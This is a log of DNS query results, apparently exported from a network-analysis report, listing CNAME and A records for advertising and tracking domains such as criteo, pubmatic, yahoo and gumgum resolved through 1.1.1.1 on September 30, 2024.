                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.604994059 CEST1.1.1.1192.168.2.40x311No error (0)pubmatic-match.dotomi.combfp.global.dual.dotomi.weighted.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.607260942 CEST1.1.1.1192.168.2.40xdb58No error (0)pubmatic-match.dotomi.combfp.global.dual.dotomi.weighted.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.862962008 CEST1.1.1.1192.168.2.40x4ae5No error (0)ssbsync.smartadserver.comssbsync-geo.smartadserver.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.862962008 CEST1.1.1.1192.168.2.40x4ae5No error (0)ssbsync-geo.smartadserver.comusersync-geo-global.usersync-prod-sas.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.869131088 CEST1.1.1.1192.168.2.40x8804No error (0)dis.criteo.comwidget.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.869131088 CEST1.1.1.1192.168.2.40x8804No error (0)widget.nl3.vip.prod.criteo.com178.250.1.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.869143009 CEST1.1.1.1192.168.2.40x5a73No error (0)dis.criteo.comwidget.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.985668898 CEST1.1.1.1192.168.2.40xf303No error (0)pbs.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.985668898 CEST1.1.1.1192.168.2.40xf303No error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.985668898 CEST1.1.1.1192.168.2.40xf303No error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.986043930 CEST1.1.1.1192.168.2.40x8918No error (0)pbs.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.989017963 CEST1.1.1.1192.168.2.40x773aNo error (0)ws.rqtrk.eu57.129.18.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.989017963 CEST1.1.1.1192.168.2.40x773aNo error (0)ws.rqtrk.eu57.129.18.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.989017963 CEST1.1.1.1192.168.2.40x773aNo error (0)ws.rqtrk.eu57.129.18.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.989017963 CEST1.1.1.1192.168.2.40x773aNo error (0)ws.rqtrk.eu57.129.18.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.989017963 CEST1.1.1.1192.168.2.40x773aNo error (0)ws.rqtrk.eu57.129.18.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.102834940 CEST1.1.1.1192.168.2.40xddaNo error (0)ce.lijit.comce-ew1.lijit.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.102834940 CEST1.1.1.1192.168.2.40xddaNo error (0)ce-ew1.lijit.comraptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.102891922 CEST1.1.1.1192.168.2.40xf39fNo error (0)ce.lijit.comce-ew1.lijit.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.102891922 CEST1.1.1.1192.168.2.40xf39fNo error (0)ce-ew1.lijit.comraptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.102891922 CEST1.1.1.1192.168.2.40xf39fNo error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com99.80.51.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.102891922 CEST1.1.1.1192.168.2.40xf39fNo error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com34.248.75.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.102891922 CEST1.1.1.1192.168.2.40xf39fNo error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com54.78.106.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.102891922 CEST1.1.1.1192.168.2.40xf39fNo error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com54.220.80.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.102891922 CEST1.1.1.1192.168.2.40xf39fNo error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com52.212.132.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.102891922 CEST1.1.1.1192.168.2.40xf39fNo error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com52.211.250.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.102891922 CEST1.1.1.1192.168.2.40xf39fNo error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com52.51.221.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.102891922 CEST1.1.1.1192.168.2.40xf39fNo error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com52.49.236.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.152029991 CEST1.1.1.1192.168.2.40x863dNo error (0)sync.crwdcntrl.net54.74.215.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.152029991 CEST1.1.1.1192.168.2.40x863dNo error (0)sync.crwdcntrl.net52.211.255.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.152029991 CEST1.1.1.1192.168.2.40x863dNo error (0)sync.crwdcntrl.net54.76.166.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.152029991 CEST1.1.1.1192.168.2.40x863dNo error (0)sync.crwdcntrl.net54.78.53.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.152029991 CEST1.1.1.1192.168.2.40x863dNo error (0)sync.crwdcntrl.net54.216.230.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.152029991 CEST1.1.1.1192.168.2.40x863dNo error (0)sync.crwdcntrl.net54.171.123.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.152029991 CEST1.1.1.1192.168.2.40x863dNo error (0)sync.crwdcntrl.net52.19.187.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.152029991 CEST1.1.1.1192.168.2.40x863dNo error (0)sync.crwdcntrl.net34.251.185.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.241306067 CEST1.1.1.1192.168.2.40x677fNo error (0)pixel.tapad.com34.111.113.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.405282021 CEST1.1.1.1192.168.2.40x1e5bNo error (0)dis.criteo.comwidget.us5.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.405282021 CEST1.1.1.1192.168.2.40x1e5bNo error (0)widget.us5.vip.prod.criteo.com74.119.117.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.567388058 CEST1.1.1.1192.168.2.40xebb4No error (0)pixel.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.567751884 CEST1.1.1.1192.168.2.40x3cffNo error (0)pixel.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.577521086 CEST1.1.1.1192.168.2.40x29aNo error (0)simage4.pubmatic.comimage4-v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.577521086 CEST1.1.1.1192.168.2.40x29aNo error (0)image4-v2.pubmnet.comspug-amsfpairbc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.577521086 CEST1.1.1.1192.168.2.40x29aNo error (0)spug-amsfpairbc.pubmnet.com198.47.127.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.578197956 CEST1.1.1.1192.168.2.40x13f9No error (0)simage4.pubmatic.comimage4-v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.578197956 CEST1.1.1.1192.168.2.40x13f9No error (0)image4-v2.pubmnet.comspug-lhrc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.580321074 CEST1.1.1.1192.168.2.40x9814No error (0)match.deepintent.comm.deepintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.580321074 CEST1.1.1.1192.168.2.40x9814No error (0)m.deepintent.com169.197.150.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.580321074 CEST1.1.1.1192.168.2.40x9814No error (0)m.deepintent.com38.91.45.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.580321074 CEST1.1.1.1192.168.2.40x9814No error (0)m.deepintent.com8.18.47.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.580321074 CEST1.1.1.1192.168.2.40x9814No error (0)m.deepintent.com169.197.150.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.581413984 CEST1.1.1.1192.168.2.40x3d95No error (0)crb.kargo.com18.196.164.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.581413984 CEST1.1.1.1192.168.2.40x3d95No error (0)crb.kargo.com18.193.235.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.581413984 CEST1.1.1.1192.168.2.40x3d95No error (0)crb.kargo.com18.158.122.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.775748014 CEST1.1.1.1192.168.2.40x26deNo error (0)image4.pubmatic.comimage4-v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.775748014 CEST1.1.1.1192.168.2.40x26deNo error (0)image4-v2.pubmnet.comspug-amsfpairbc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.775748014 CEST1.1.1.1192.168.2.40x26deNo error (0)spug-amsfpairbc.pubmnet.com198.47.127.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.777851105 CEST1.1.1.1192.168.2.40x3f10No error (0)image4.pubmatic.comimage4-v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.777851105 CEST1.1.1.1192.168.2.40x3f10No error (0)image4-v2.pubmnet.comspug-amsfpairbc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.780008078 CEST1.1.1.1192.168.2.40x812aNo error (0)usersync.gumgum.com52.210.15.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.780008078 CEST1.1.1.1192.168.2.40x812aNo error (0)usersync.gumgum.com34.247.233.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.780008078 CEST1.1.1.1192.168.2.40x812aNo error (0)usersync.gumgum.com34.247.205.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.923305988 CEST1.1.1.1192.168.2.40x6e4No error (0)match.sharethrough.commatch-eu-central-1-ecs.sharethrough.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.923305988 CEST1.1.1.1192.168.2.40x6e4No error (0)match-eu-central-1-ecs.sharethrough.com18.195.234.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:31.924995899 CEST1.1.1.1192.168.2.40x9ce9No error (0)match.sharethrough.commatch-eu-central-1-ecs.sharethrough.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.085566998 CEST1.1.1.1192.168.2.40xf871No error (0)capi.connatix.comcapi.connatix.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.085978985 CEST1.1.1.1192.168.2.40xb45aNo error (0)capi.connatix.comcapi.connatix.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.089471102 CEST1.1.1.1192.168.2.40xffcNo error (0)aax-eu.amazon-adsystem.com52.95.122.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.332451105 CEST1.1.1.1192.168.2.40xeaf9No error (0)sync.intentiq.com3.160.150.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.332451105 CEST1.1.1.1192.168.2.40xeaf9No error (0)sync.intentiq.com3.160.150.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.332451105 CEST1.1.1.1192.168.2.40xeaf9No error (0)sync.intentiq.com3.160.150.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.332451105 CEST1.1.1.1192.168.2.40xeaf9No error (0)sync.intentiq.com3.160.150.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.456687927 CEST1.1.1.1192.168.2.40x25afNo error (0)a.sportradarserving.comzagreb.geo.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.456687927 CEST1.1.1.1192.168.2.40x25afNo error (0)zagreb.geo.iponweb.netpool-eu.zagreb.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.456783056 CEST1.1.1.1192.168.2.40x4bedNo error (0)a.sportradarserving.comzagreb.geo.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.456783056 CEST1.1.1.1192.168.2.40x4bedNo error (0)zagreb.geo.iponweb.netpool-eu.zagreb.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.456783056 CEST1.1.1.1192.168.2.40x4bedNo error (0)pool-eu.zagreb.iponweb.net35.214.174.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.565710068 CEST1.1.1.1192.168.2.40x4e1cNo error (0)match.sharethrough.commatch-eu-central-1-ecs.sharethrough.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.565813065 CEST1.1.1.1192.168.2.40x157No error (0)match.sharethrough.commatch-eu-central-1-ecs.sharethrough.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.565813065 CEST1.1.1.1192.168.2.40x157No error (0)match-eu-central-1-ecs.sharethrough.com18.197.30.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.792795897 CEST1.1.1.1192.168.2.40x1eb9No error (0)widget.us.criteo.comwidget.us5.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.792795897 CEST1.1.1.1192.168.2.40x1eb9No error (0)widget.us5.vip.prod.criteo.com74.119.117.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:32.793236971 CEST1.1.1.1192.168.2.40x34afNo error (0)widget.us.criteo.comwidget.us5.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.059245110 CEST1.1.1.1192.168.2.40xe83eNo error (0)sync-pm.ads.yieldmo.comsync.ads.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.059245110 CEST1.1.1.1192.168.2.40xe83eNo error (0)sync.ads.yieldmo.comeu-west-1-sync.ads.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.059245110 CEST1.1.1.1192.168.2.40xe83eNo error (0)eu-west-1-sync.ads.yieldmo.comsync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.059245110 CEST1.1.1.1192.168.2.40xe83eNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com3.251.14.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.059245110 CEST1.1.1.1192.168.2.40xe83eNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com52.16.44.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.059245110 CEST1.1.1.1192.168.2.40xe83eNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com99.80.251.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.059245110 CEST1.1.1.1192.168.2.40xe83eNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com54.77.210.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.059245110 CEST1.1.1.1192.168.2.40xe83eNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com54.77.217.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.059245110 CEST1.1.1.1192.168.2.40xe83eNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com52.19.49.194A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.059245110 CEST1.1.1.1192.168.2.40xe83eNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com54.171.247.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.059245110 CEST1.1.1.1192.168.2.40xe83eNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com54.194.167.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.067742109 CEST1.1.1.1192.168.2.40x51f4No error (0)sync-pm.ads.yieldmo.comsync.ads.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.067742109 CEST1.1.1.1192.168.2.40x51f4No error (0)sync.ads.yieldmo.comeu-west-1-sync.ads.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.067742109 CEST1.1.1.1192.168.2.40x51f4No error (0)eu-west-1-sync.ads.yieldmo.comsync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.220304012 CEST1.1.1.1192.168.2.40xac67No error (0)rtb.gumgum.com3.248.14.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.220304012 CEST1.1.1.1192.168.2.40xac67No error (0)rtb.gumgum.com54.76.105.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.220304012 CEST1.1.1.1192.168.2.40xac67No error (0)rtb.gumgum.com54.77.143.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.220304012 CEST1.1.1.1192.168.2.40xac67No error (0)rtb.gumgum.com54.155.161.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.220304012 CEST1.1.1.1192.168.2.40xac67No error (0)rtb.gumgum.com54.217.9.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.220304012 CEST1.1.1.1192.168.2.40xac67No error (0)rtb.gumgum.com52.31.202.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.220304012 CEST1.1.1.1192.168.2.40xac67No error (0)rtb.gumgum.com52.31.253.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.220304012 CEST1.1.1.1192.168.2.40xac67No error (0)rtb.gumgum.com52.17.180.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.278147936 CEST1.1.1.1192.168.2.40x29faNo error (0)triplelift-match.dotomi.combfp.global.dual.dotomi.weighted.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:33.278527021 CEST1.1.1.1192.168.2.40x3980No error (0)triplelift-match.dotomi.combfp.global.dual.dotomi.weighted.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:34.084712029 CEST1.1.1.1192.168.2.40xd070No error (0)pm.w55c.netcdn.w55c.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:34.084712029 CEST1.1.1.1192.168.2.40xd070No error (0)cdn.w55c.net3.73.2.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:34.084712029 CEST1.1.1.1192.168.2.40xd070No error (0)cdn.w55c.net18.196.242.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:34.084712029 CEST1.1.1.1192.168.2.40xd070No error (0)cdn.w55c.net52.28.207.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:34.084712029 CEST1.1.1.1192.168.2.40xd070No error (0)cdn.w55c.net3.74.73.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:34.087183952 CEST1.1.1.1192.168.2.40x9872No error (0)pm.w55c.netcdn.w55c.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:34.122663021 CEST1.1.1.1192.168.2.40x2cd8No error (0)pixel.tapad.com34.111.113.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:34.124324083 CEST1.1.1.1192.168.2.40xcf74No error (0)finance.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:34.125370026 CEST1.1.1.1192.168.2.40xc41bNo error (0)finance.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:34.125370026 CEST1.1.1.1192.168.2.40xc41bNo error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:34.125370026 CEST1.1.1.1192.168.2.40xc41bNo error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.244406939 CEST1.1.1.1192.168.2.40x2c5eNo error (0)hbx.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.250623941 CEST1.1.1.1192.168.2.40x8977No error (0)ce.lijit.comce-ew1.lijit.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.250623941 CEST1.1.1.1192.168.2.40x8977No error (0)ce-ew1.lijit.comraptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.251184940 CEST1.1.1.1192.168.2.40x1e9aNo error (0)ce.lijit.comce-ew1.lijit.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.251184940 CEST1.1.1.1192.168.2.40x1e9aNo error (0)ce-ew1.lijit.comraptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:35.251184940 CEST1.1.1.1192.168.2.40x1e9aNo error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com34.248.75.162A (IP address)IN (0x0001)false
